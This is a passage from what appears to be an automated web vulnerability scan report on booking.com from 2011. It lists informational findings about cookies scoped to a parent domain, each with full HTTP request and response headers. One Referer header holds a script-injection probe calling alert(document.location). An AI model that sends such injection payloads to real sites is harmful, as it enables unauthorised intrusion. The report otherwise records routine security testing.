Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...

13.148. http://www.booking.com/hotel/us/copley-square.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...

13.149. http://www.booking.com/index.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...

13.150. http://www.booking.com/logo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /logo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logo?ver=1;t=13176005551 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:52 GMT
Server: Apache
Set-Cookie: BJS=-; domain=booking.com; expires=Tue, 04-Oct-2011 00:10:52 GMT; HTTPOnly
Set-Cookie: ramala=97.0378530025482; domain=booking.com; expires=Tue, 04-Oct-2011 00:10:52 GMT; HTTPOnly
Content-Length: 35
Content-Type: image/gif

GIF89a.............,..............;

13.151. http://www.booking.com/searchresults.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
